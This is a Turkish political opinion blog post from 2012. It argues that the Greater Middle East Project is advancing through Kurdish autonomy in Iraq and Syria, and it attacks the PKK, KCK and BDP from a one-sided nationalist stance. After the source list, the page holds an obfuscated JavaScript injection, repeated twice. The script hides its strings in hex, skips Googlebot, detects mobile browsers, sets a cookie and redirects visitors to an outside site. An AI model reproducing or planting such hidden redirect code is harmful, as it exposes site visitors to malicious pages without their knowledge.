bop_fikiragaci

Unutulan B.O.P.

156 • 12 Ağustos 2012

Kamuoyunun kaygıyla izlediği Suriye’de yaşanan olaylar ve olaylara bağlı olarak yeniden şekillenen Türkiye-Suriye ilişkileri, özellikle son zamanlarda Suriye’nin kuzeyinde terörist grupların kontrol noktaları oluşturmasıyla çoğu insan tarafından unutulan eski bir projeyi yeniden akla getirdi; Büyük Ortadoğu Projesi. Özellikle dönemin yetkili ağızları tarafından seslendirilen ‘sadece sistemler değil, sınırlar da değişecek’ açıklamaları ve bazı kaynaklarda yayınlanan Türkiye’nin güneydoğusunu da içine alan Birleşik Kürdistan haritaları, projenin Türk kamuoyunda büyük tepkiyle karşılanmasına yol açmıştı. Projenin duyurulması ve ardından ABD’nin Irak’a düzenlediği askeri harekat, Iraklı Kürtleri Saddam’ın kontrolünden kurtararak bölgede bir aktör haline getirdi. Bu aktörün niteliğini anlamak için geçmişini hatırlamakta fayda var;

‘’Irak toprakları 1639’dan 1917’ye dek Osmanlı Devleti toprakları kapsamında kalmıştır. Günümüzde hızlı bir nüfus artış hızı olan ülkede Kürt nüfusu 5.250.000 ile 6.250.000 arasındadır. Kürdistan Özerk Bölgesi ise şu şekilde anlatılabilir: 11 Mart 1970’de Mustafa Barzani ve Saddam Hüseyin arasında yapılan anlaşmayla kuruldu. Kürtçe ülkede Arapça’nın ardından ikinci resmi dil sayıldı. Kürtlerin ülkedeki söz hakkı arttı;ancak süregelen zamanda İran-Irak Savaşı’nın patlak vermesi sonucu Irak’ın kuzey bölgesinde bulunan Kürtler İran’a destek verdiler ve savaş sonrasında özerklik anlaşması iptal edildi. Ülke içindeki bu karışıklıktan kaçan Kürtlere Türkiye tarafından Türk pasaportu verildi ve Kürtler Irak’ta tekrar söz sahibi olana dek bu pasaportla istedikleri yerlere gitmeleri sağlandı. Birinci Körfez Savaşı’ndan sonra çıkarılan uçuş yasağından dolayı bölge bugüne kadar Bağdat’ın yönetimi altında değildir. Bölge Kürdistan Parlamentosu’nun kontrolü altındadır.

Günümüzde Mesut Barzani liderliğindeki Kürdistan Demokratik Partisi ile Celal Talabani liderliğindeki Kürdistan Yurtseverler Birliği arasında çıkan anlaşmazlıklar sonucu bölge ikiye bölünmüşse de son zamanlar bu anlaşmazlık giderilmek üzeredir.2009 seçimlerinden bu iki görüş birleşmiş ve %57 oy almıştır. (1)” Bu birleşme Irak’ta bulunan siyasi mutabakat ve otorite zayıflığından fayda sağlamada önemli bir unsur olacaktır ve olası bir bağımsızlık ilanına ortam hazırlayacaktır.

Suriye’deki duruma bakacak olursak, Suriye’de başlayan olaylar 11 Mart 2011’de Esad’a karşı olan muhaliflerin topyekün direniş göstermesi ile başlayan bir isyan olarak nitelendirilir. Her iki tarafın da dışarıdan ekonomik ve askeri destek aldığı açıktır. Ülkedeki bazı yerleşim alanları Suriye Devleti’nin elinden çıkmıştır. Şu ana kadar yaşamını yitiren insan sayısının 25.000-30.000 kadar olduğu öngörülmektedir. Suriye’de bulunan muhalifler ise şu şekilde ayrılabilir: Otokratik rejimi devirip, yerine demokratik bir sistem koymak isteyenler (her düşünce ve dinden kaynaşmış bir kesim), aşırı islamcı, adı özellikle El Kaideyle anılan şeriat düzenine yatkın muhalifler ve özgürlük isteyen Kürt muhalifler. Aslına bakılırsa buradaki Kürt muhalefet ne Esad tarafında ne de muhaliflere destekte. Üçüncü bir yol olan Kürdistan Özerk Bölgesi’ni kurma düşüncesinde.(2) Bu kesimin siyasi ve ekonomik olarak çok güçlü değildir ve doğru bir politika ile aslında durum Türkiye lehine bile çevrilebilir; çünkü Suriye’deki Kürt hareketinin otonomi talep edecek kadar güçlü bir geçmişi, böyle bir geleneği yoktur. İşin en ilginç yanı PKK terör örgütüne çok yakın değiller hatta PKK’yı ekarte ettikleri bile söylenebilir. Muhalif güçler PKK’ya ve onun bölgedeki uzantısı olarak görülen PYD’ye sıcak bakmamaktadırlar.(3) Ancak Türkiye’den gelen ”Suriye askeri sınırdan çekilsin.” şeklindeki açıklamalar sonrasında sınırdan Halep’e doğru kayan Suriye askeri burada boşluk meydana getirmiştir ve buraya Özerk Kürdistan temelleri atılmaya çalışılmaktadır. Bunun en önemli kanıtı ise PYD’ye bağlı militanların Türkiye sınırına yakın hakim tepelere sözde Kürdistan bayrağını çekmesidir (4). Mesut Barzani’nin ”Suriyeli Kürtleri eğitiyoruz.”(5) sözü ise bölgedeki organize edilmiş siyasi terörü çarpıcı bir şekilde gözler önüne sermektedir. Esad’ın çıkmaza giren politikaları Özerk Kürdistan düşüncesini daha güçlendirmektedir. Esad’ın PKK’ya destek verdiği ise su götürmez bir gerçektir artık. Türkiye buradaki Kürtlere sahip çıktığı vakit PKK’ya çok fazla bağlı olmamaya çalışan bu yapılanma Türkiye tarafına doğru kayabilir. Recep Tayyip Erdoğan ise, Suriye ordusunun sınıra asker yığmasının açık bir savaş sebebi olacağını söyledi. Tabii ki her saniye değişen dış politikamızın ilerleyen zamanlarda ne getireceği bilinmez.

Türkiye’de bulunan siyasi yapılanma ise çok ciddi vaziyette: KCK, siyasi parti çatısı altında birleşme, aşiretlerle kurulan ilişkiler gibi birkaç koldan yürütülen bir çalışma içerisinde. Ayrıca biraz önce bahsettiğimiz Suriye’deki Özerk Kürdistan tanımı için BDP milletvekili Özdal Üçer ”Bugünden sonrası Kürtlerin baharıdır.”(6) demiştir. Yani Türkiye’deki siyasi uzantılar dış ilişkilere dokunabilecek kadar gelişmiş bir vaziyette. BDP milletvekillerinin özerklik, anadil, hatta bağımsızlık istekleri kaygı uyandırıcı. Abdullah Öcalan’ın ev hapsi hatta serbest bırakılması da istekler arasında. PKK’nın medya ayağı olan Roj Tv’ye konuşan BDP liderinin ise şunları söylediğini bilmekte yarar var: ”Kürtler’in tarihi bir coğrafyası, vatanı vardır; Kürdistan’dır. Bu coğrafyada ve kültür, ekonomi üzerinde söz hakkı vardır. Bunu kullanmak tek başına devletin, Ankara merkezli devletin egemenliğine ters değildir. Birlikte paylaşılabilir. Bunun adı; özerklik hukukudur. Türkiye’nin her yerinde uygulanabilir. Kürt halkı Ortadoğu’nun siyasi gücüdür. Kürtler, üzerinde oynanacak, dizayn edilecek halk olmaktan öte, bu süreçte rol alabilecek bir halktır. Başka bir halkın, devletin, ulusun vicdanına kendisini teslim edemez, BDP de bunu savunamaz.”(7).Emine Ayna ise geçmişte olan İskenderun saldırısı ile ilgili ”Çatışmalar artık sadece Kürdistan sınırları içinde olmayacaktır” (8) demişti. Bu da açıkça kendilerine sınır belirlediklerini ve Türkiye sınırlarını tanımadıklarını belirtmeye çalıştıklarının göstergesidir.

Savcılık iddianamesine göre 17 Mayıs 2005’te kurulan KCK ise terörist hareketin Türkiye’deki şehir içi organizasyon şebekesidir. Kendini devlet olmayan örgütlenmiş, demokratik, toplumsal bir organizasyon şeklinde tanımlayan terör örgütü KCK’nın kuruluş amacı ise 2 şekilde özetlenebilir: Birincisi silahlı dağ kadrosu ile ovadaki siyasi grubun birbirine karşı duymaya başladığı güvensizlikten ötürü onları denetleyen bir ara yapı kurulmak istenmesi ve ikincisi ise 2000li yıllarda siyaset yapma yasağı alan kişilere bir siyasi istihdam olanağı. Bu yapıların siyasi derinliğini ise PKK-MİT arasında ortaya çıkmış olan görüşmelerden anlayabiliriz. Bir diğer istedikleri durum ise 4 ülkenin(Türkiye, Irak, İran, Suriye) topraklarında bulunan Kürt bölgelerini kapsayan bir Pan-Kürdizm projesidir. Kendilerine göre vatandaşlık tanımını bile uydurmuşlar.”Kürdistan sınırları içinde doğup yaşayan veya KCK sistemine bağlı olan herkes KCK vatandaşıdır.(9)” İş bu noktaya kadar ilerlemişken bu konuyu ciddiye almamak büyük gaflet içinde bulunmak olur. Bu yapılanmalar için esaslı bir önlem almadan, ”Terör er ya da geç bitecektir.” söylemleri ise duruma yönelik söylenmiş, havada kalan boş vaatlerden öteye gidemeyecektir.

Devletin ise PKK ile görüşmeleri malum. İç ve dış kamuoyuna karşı güçlü, teröre karşı aman vermez bir görüntü veren hükümetin, Oslo’da çeşitli kanallar aracılığı ile terör örgütüyle masaya oturması ise büyük bir şok etkisi yarattı. En ilgi çekici taraf ise müzakereleri koordine eden İngiliz… İnternete düşen ses kaydına göre dönemin Başbakanlık Müsteşarı Fidan, MİT yöneticisi Güneş, Norveç’te PKK yöneticileriyle toplantı yaptı. Ses kaydına göre Fidan ve Güneş, İmralı’da Öcalan’la hükümetin açılım politikasını tartıştı. PKK yöneticilerine bu görüşme hakkında bilgi veren devlet yöneticileri, İmralı ile PKK arasında mesaj taşıdıklarını da söylüyor. Ankara’da büyük yankı uyandıran ses kaydı ilk olarak PKK’ya yakın olduğu sanılan sitelerde yayınlandı, ancak bu siteler ‘hack’lendiklerini açıkladı(10). Sonrasında MİT görevlileri hakkında çıkan yasalar malumunuz. Bu konu hakkında daha nice örnekler ve söylemler mevcuttur.

Gelelim şu arada kaynayan B.O.P.’un konu üzerindeki ilgisine. B.O.P. için doğmadan ölen proje dese de başbakanımız, kararlılığı dönemin ABD Dışişleri Bakanı Condoleezza Rice’ın 7 Ağustos 2003 tarihinde Washington Post gazetesinde yayınlanan yazısında gözler önüne seriliyor: Rice bu yazısında bölgede bulunan 22 devletin rejiminin, sınır ve haritalarının değiştirileceğini, Türkiye’nin de bunların içinde olduğunu anlatıyordu(11)! Proje yavaş yavaş kendini gösteriyor. Oluşan konjonktür, eğer önüne geçilmezse Irak’taki ve Suriye’deki otonom Kürt bölgelerinin birleşme ihtimalini doğurabilir. Zamanında Büyük Ortadoğu Projesi eşbaşkanı olduğunu açıklayan sayın başbakanımızın ve dolayısıyla Türk hükümetinin bu gelişmeler karşısında ne tavır alacağı ve Kasım’daki seçimleri geçirdikten sonra ABD’nin nasıl bir strateji izleyeceği merak konusu. BDP’li vekillerin Diyarbakır’ı başkentlerden biri ilan etmesi de ne derece ciddi olduklarının göstergesi. Türkiye’nin bu konuda politikalarını aciliyet ile değiştirmesinde, muhalefetin halkı bilgilendirmesinde büyük yarar görüyorum. Aksi halde bu olası ihtimaller maalesef ülkemize çok uzak görünmüyor.

KAYNAKÇA

1-http://tr.wikipedia.org/wiki/K%C3%BCrtler

2-http://www.ozgundurus.com/Haber/Soylesi/30072012/Nese-DuzelVeysel-Ayhan-Kurtler-ucuncu-yolu-tercih-etti-.php

3- http://www.stargazete.com/politika/suriyeli-kurtler-pkkyi-otorite-kabul-etmez/haber-647302

4- http://www.haberler.com/suriye-de-turkiye-sinirina-yakin-bolgeye-dikilen-3744055-haberi/

5- http://www.cnnturk.com/2012/dunya/07/24/barzani.suriyeli.kurtleri.egitiyoruz/670004.0/index.html

6- http://www.gazetevan.com/BDPli-Ucerden-Suriyeli-Kurtlere-Destek—-Van-Haberleri-53219.html

7-http://siyaset.milliyet.com.tr/bdp-ocalan-in-iki-cumlelik-notundan-ne-mesaj-cikardi-/siyaset/siyasetdetay/23.01.2012/1492625/default.html

8- http://www.internethaber.com/emine-aynadan-tuyler-urperten-sozler-257651h.html

9- KCK Nedir? ; Taha AKYOL; Hürriyet Gazetesi; 21 Ekim 2011

10- http://haber.gazetevatan.com/osloda-pkk-ile-5-kez-muzakere-yapilmis/399507/1/Haber

11- Rice, sekiz yıl önce ‘22 ülkenin sınırı ve rejimi değişecek’ demişti!; Mustafa Mutlu; Vatan Gazetesi; 23 Şubat 2011    var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Kategori: SİYASET
Etiketler:

İlgili Gönderiler